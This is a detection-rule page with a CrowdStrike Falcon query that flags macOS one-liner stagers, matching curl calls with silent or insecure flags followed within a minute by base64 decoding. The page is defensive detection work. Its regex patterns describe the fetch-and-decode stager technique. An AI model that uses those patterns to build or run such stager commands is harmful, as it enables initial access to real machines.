Volver al hub

InstallFix on macOS

The InstallFix query is designed to catch the execution patterns of one-liner stagers or initial access scripts that often masquerade as legitimate system fixes or installers through a high-confidence sequence where a curl command - configured with flags typically used to bypass security or silence output - is executed in close temporal proximity (within 1 minute) to a command involving Base64 decoding.

EDRdetectionT1140T1059.004
FDR intermediatepor Szymon Kozicki (cql-hub.com) 1 min read

Query

#repo="base_sensor"
| #event_simpleName="ProcessRollup2"
| event_platform="Mac"
| correlate(
  Base64Decode: {
    #event_simpleName="ProcessRollup2"
    | CommandLine=/(?i)base64\s+-(d|D)/
  } include:[aid],

  SuspiciousCurl: {
    #event_simpleName="ProcessRollup2"
    | CommandLine=/(?i)curl\s+.*https?:\/\//
    | CommandLine=/(?i)curl\s+-[a-z]*[ksfls]{4,}/
    | rootURL := "https://falcon.us-2.crowdstrike.com/"
    | format("[Tree](%sgraphs/process-explorer/tree?id=pid:%s:%s)", field=["rootURL", "aid", "TargetProcessId"], as="URL")
  } include:[ComputerName, UserName, aid, CommandLine, URL],
  within=1m,
  sequence=true,
  globalConstraints=[aid],
  includeMatchesOnceOnly=true
)
| ComputerName            := SuspiciousCurl.ComputerName
| aid           := SuspiciousCurl.aid
| @timestamp         := SuspiciousCurl.@timestamp
| Tree           := SuspiciousCurl.URL
| UserName            := SuspiciousCurl.UserName
| Curl_CMD := SuspiciousCurl.CommandLine
| table([@timestamp, UserName, ComputerName, aid, Tree, Curl_CMD])

Explicación

Importado desde cql-hub.com. Agrega explicación de pipes aquí.

Variables a ajustar

Revisa y ajusta los valores según tu entorno.